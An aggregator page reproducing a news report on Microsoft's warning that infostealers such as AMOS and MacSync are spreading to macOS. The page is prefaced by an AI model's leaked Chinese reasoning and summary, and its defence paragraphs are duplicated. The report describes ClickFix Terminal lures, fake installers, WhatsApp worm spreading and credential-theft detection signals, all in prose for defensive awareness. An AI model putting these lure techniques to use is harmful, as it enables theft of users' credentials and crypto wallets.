好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读文章,抓住主要内容。 文章标题是“Microsoft警告信息窃取恶意软件从Windows扩展到macOS”。内容提到微软发现针对macOS的信息窃取攻击激增,使用Python等跨平台语言和滥用可信平台。攻击者利用社会工程学、恶意DMG文件和伪装成合法应用的恶意软件来窃取用户数据。 接下来,我需要将这些要点浓缩到100字以内。重点包括:微软警告、攻击扩展到macOS、使用Python和可信平台、社会工程学、恶意文件、窃取数据类型以及防御建议。 最后,确保语言简洁明了,直接描述文章内容,不使用任何开头词。这样用户就能快速了解文章的核心信息了。 </think> 微软警告称,信息窃取恶意软件正从Windows扩展至macOS,利用Python等跨平台语言和可信平台进行攻击。攻击者通过社会工程学、恶意DMG文件和伪装成合法应用的恶意软件窃取用户凭证、加密货币和会话数据。微软建议采取多层防御措施,包括培训用户识别虚假广告和可疑安装程序,并监控终端活动及异常访问行为。 2026-2-4 11:30:3 Author: securityaffairs.com(查看原文) 阅读量:0 收藏
Microsoft: Info-Stealing malware expands from Windows to macOS
Pierluigi Paganini
February 04, 2026
Microsoft warns info-stealing attacks are expanding from Windows to macOS, using cross-platform languages like Python and abusing trusted platforms.
Microsoft warns info-stealing attacks are rapidly expanding from Windows to macOS, using cross-platform languages like Python and abusing trusted platforms.
Since late 2025, Microsoft has seen a surge in macOS infostealer attacks using social engineering, fake fixes, and malicious DMG files. Attackers deploy macOS-specific and Python-based stealers, abuse trusted apps like WhatsApp, and use native tools to steal credentials, crypto, and session data while evading defenses.
“Since late 2025, Microsoft Defender Experts has observed macOS targeted infostealer campaigns using social engineering techniques—including ClickFix-style prompts and malicious DMG installers—to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS).” reads the report published by Microsoft.
“These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, secrets from browsers, keychains, and developer environments.”
Attackers are increasingly targeting Mac users and organizations with information-stealing malware using tricks that look legitimate and familiar.
Mac users are lured to fake websites, often via Google Ads, that push fake software or ask them to paste commands into Terminal. These scams install stealers like DigitStealer, MacSync, and Atomic Stealer, which quietly grab browser passwords, crypto wallets, and developer credentials, then erase traces. This can lead to account takeovers, financial theft, and access to company systems.
At the same time, phishing emails are spreading Python-based stealers because they’re easy to build and hard to detect. Malware like PXA Stealer steals logins, financial data, and browser sessions, often using Telegram and trusted tools to hide activity.
Attackers are also abusing trusted platforms like WhatsApp and PDF tools to spread malware, turning normal apps into delivery channels for credential and crypto theft.
In November 2025, Microsoft observed a WhatsApp abuse campaign that spread Eternidade Stealer through a multi-stage, worm-like infection chain. The attack starts with an obfuscated VB script that launches PowerShell to fetch payloads. A Python component hijacks WhatsApp accounts to message all contacts with malicious files, while a malicious MSI installs Eternidade Stealer to steal banking, payment, and cryptocurrency credentials.
In September 2025, Microsoft uncovered a fake “Crystal PDF” editor spread via Google Ads and SEO poisoning. Once installed, it persists via scheduled tasks and steals browser cookies, sessions, and credentials from Chrome and Firefox.
Microsoft recommends a layered defense to stop macOS, Python-based, and platform-abuse infostealers. Train users to spot fake ads, bogus installers, and ClickFix copy-paste tricks, and avoid unsigned DMGs or “terminal fixes.” Monitor macOS for risky Terminal activity like curl, Base64 decoding, AppleScript, and fileless execution chains. Watch for unusual access to Keychain, browser credentials, cloud keys, and crypto wallets.
Inspect outbound traffic for POST requests to new or suspicious domains and for short-lived ZIP files created in temp folders before data exfiltration. Block known command-and-control servers using threat intelligence. Strengthen defenses against Python and LOLBIN abuse, including certutil misuse, AutoIt activity, and process hollowing.
Enable cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated investigation, and tamper protection. Apply attack surface reduction rules to block obfuscated scripts, untrusted executables, and scripts launching downloaded payloads.
Microsoft recommends a layered defense to stop macOS, Python-based, and platform-abuse infostealers. Train users to spot fake ads, bogus installers, and ClickFix copy-paste tricks, and avoid unsigned DMGs or “terminal fixes.” Monitor macOS for risky Terminal activity like curl, Base64 decoding, AppleScript, and fileless execution chains. Watch for unusual access to Keychain, browser credentials, cloud keys, and crypto wallets.
Inspect outbound traffic for POST requests to new or suspicious domains and for short-lived ZIP files created in temp folders before data exfiltration. Block known command-and-control servers using threat intelligence. Strengthen defenses against Python and LOLBIN abuse, including certutil misuse, AutoIt activity, and process hollowing.
Enable cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated investigation, and tamper protection. Apply attack surface reduction rules to block obfuscated scripts, untrusted executables, and scripts launching downloaded payloads.
“Due to the growing threat of Python-based infostealers, it is important that organizations protect their environment by being aware of the tactics, techniques, and procedures used by the threat actors who deploy this type of malware.” Microsoft concludes. “Being compromised by infostealers can lead to data breaches, unauthorized access to internal systems, business email compromise (BEC), supply chain attacks, and ransomware attacks.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Info-Stealing attacks)
如有侵权请联系:admin#unsafe.sh